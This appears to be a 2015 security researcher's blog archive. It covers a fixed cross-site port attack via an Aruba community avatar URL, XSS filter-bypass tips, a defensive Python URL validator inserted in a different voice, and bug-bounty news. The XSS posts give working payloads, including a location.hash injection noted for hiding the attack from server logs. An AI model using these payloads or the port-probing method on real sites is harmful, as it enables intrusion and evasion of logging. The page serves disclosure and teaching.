David Sopas

web security researcher

08/08/15 Advisories

ArubaNetworks Avatar Image XSPA

I found out that it was possible to run an XSPA (Cross Site Port Attack) using the Avatar URL option on any registered community profile.
XSPA allows attackers to abuse functionality available in most web applications to port scan intranet and external Internet-facing servers.
An application is vulnerable to Cross Site Port Attacks if it processes user-supplied URLs and does not verify/sanitize the backend response received from the server.

Proof-of-concept:
For this type of attack I always use the Nmap test machine, scanme.nmap.org, to check which ports are open on the server.
Using Nmap on my own machine I tested 3 ports on scanme.nmap.org:

80/tcp open http
81/tcp closed http
443/tcp closed https

I then entered the following external URL in my Avatar web option (https://community.arubanetworks.com/t5/user/myprofilepage/tab/user-icons%3Aexternal):
http://scanme.nmap.org:80/

No server error.

I modified it to:
http://scanme.nmap.org:81/

And then to:
http://scanme.nmap.org:443/

The following errors were returned on the server:

http://scanme.nmap.org:81 – GET http://scanme.nmap.org:81/ net::ERR_CONNECTION_REFUSED

http://scanme.nmap.org:443 – GET http://scanme.nmap.org:443/ net::ERR_CONNECTION_REFUSED

You can even check that the port is stored in the avatar HTML:

<img id="display" class="lia-user-avatar-message" title="dsopas" src="http://scanme.nmap.org:443/" alt="dsopas" />


The Aruba security team has already fixed this issue, so I decided to share it with you guys.
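The defensive counterpart to the issue above, as an added example that is not Aruba's code: a server-side validator for a user-supplied avatar URL that only accepts http/https on the scheme's default port, rejects hosts resolving to non-public addresses, and returns one identical error for every rejection so the response cannot reveal whether a port was open or refused. The DNS table, its addresses and `stub_resolver` are constructed stand-ins so the example runs offline; a deployment would plug in a real resolver.

```python
# Added example (not Aruba's code): validate a user-supplied avatar URL on the
# server before storing or fetching it, so the app cannot be used to port scan.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
DEFAULT_PORTS = {"http": 80, "https": 443}
GENERIC_ERROR = "avatar URL not accepted"  # same text for every failure

# Constructed DNS table (illustrative addresses) so the example runs offline.
FAKE_DNS = {"scanme.nmap.org": {"45.33.32.156"},
            "intranet.example.com": {"10.0.0.5"}}

def is_public_address(addr):
    """Globally routable unicast only: no RFC 1918, loopback, link-local,
    multicast or reserved ranges (is_global alone can let multicast through)."""
    ip = ipaddress.ip_address(addr)
    return ip.is_global and not (ip.is_multicast or ip.is_reserved)

def stub_resolver(host):
    """Offline stand-in for socket.getaddrinfo; literal IPs resolve to self."""
    try:
        return {str(ipaddress.ip_address(host))}
    except ValueError:
        if host not in FAKE_DNS:
            raise socket.gaierror("constructed: no record for %s" % host)
        return FAKE_DNS[host]

def validate_avatar_url(url, resolver=stub_resolver):
    """Return (accepted, reason). Accepted only for an http(s) URL without
    credentials, on the scheme's default port, resolving only to public IPs."""
    try:
        parts = urlsplit(url)
        port = parts.port  # ValueError on a malformed port such as ":8x"
    except ValueError:
        return False, GENERIC_ERROR
    scheme = parts.scheme.lower()
    if (scheme not in ALLOWED_SCHEMES or not parts.hostname
            or parts.username or parts.password):  # no user:pass@host forms
        return False, GENERIC_ERROR
    if port is not None and port != DEFAULT_PORTS[scheme]:
        return False, GENERIC_ERROR  # ":81", or ":443" on http, is a probe
    try:
        addresses = resolver(parts.hostname)
    except OSError:  # socket.gaierror subclasses OSError
        return False, GENERIC_ERROR
    if not addresses or not all(is_public_address(a) for a in addresses):
        return False, GENERIC_ERROR
    return True, "ok"
```

The same generic reason is returned whether the port is wrong, the host is internal or resolution fails, which is the property the advisory shows was missing.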

06/08/15 Interesting Readings, News

Details on the Cross-Site Request Forgery Vulnerability Disclosed at Black Hat

06/08/15 Bug Bounty, Swag

First to reach 1000 rep score on Cobalt.io

Yes! I made it.

Since registering in March this year I have reached more than 1000 reputation points on Cobalt.io and became the first to do so.
Most of the points were earned in private, invite-only programs, but a couple were public programs from companies like Nexmo, Weebly, DoSomething and Circle.

My next goal? Keep having fun with the guys at Cobalt.io. They have a great team and are supported by many talented security researchers.

If you are a company that needs its security checked by professionals, just register your program.

06/08/15 Bug Bounty, Donations

Sharing is caring!

I always try to help the local dog and cat shelter with food and medication.
Some extra cash from bug bounties has helped me give more often, so I try to do my best.

The reward is priceless: abandoned dogs and cats getting a better life.

Hope you guys do the same…

04/08/15 Tips and Tricks

No parentheses allowed? location.hash is here

I came across a web application in a private bounty program that reflected my variable, xss, in the following code:

var _s_tab = xss;
var _s_params = "";
var _s_autoScroll = true;
setTimeout("try { s_callAjax('search', ''); } catch(ex) { setTimeout(\"s_callAjax('search', '');\", 2000);}", 50);

So what I tried next was to put an XSS vector in place:

vuln-site/?t=xss;alert(1);//

Which reflected:

var _s_tab = xss;alert1;//;

So it removed the ( ) characters… I thought to myself: a challenge!

My next step was to try something I had already used in previous research:
use location.hash and then execute my attack.

vuln-site/?t=1;document.body.innerHTML=location.hash#<img src=x onerror=prompt(1)>

The other good thing about this type of attack is that the payload sits in the URL hash and is therefore never sent to the server (no server logs of the actual attack payload).

04/08/15 Tips and Tricks

Tiny XSS vector

I needed a small XSS vector that could fit in a variable with a 10-character limit, for a private client, to show him that limiting the number of characters in a variable is not secure…

central.push({ 'var1': 'INJECT_HERE' });

After some attempts I was unable to find one, so I called for help 🙂

@soaj1664ashar 10 char fun: '-open()-'

Making valid JavaScript:

central.push({ 'var1': ''-open()-'' });

This XSS vector only opens a new tab/window, but in my client's case it was stored in a cookie, so it was a pain in the ass to close a window every time he navigated his web application.

Nice catch!

03/08/15 News

Exploits start against flaw
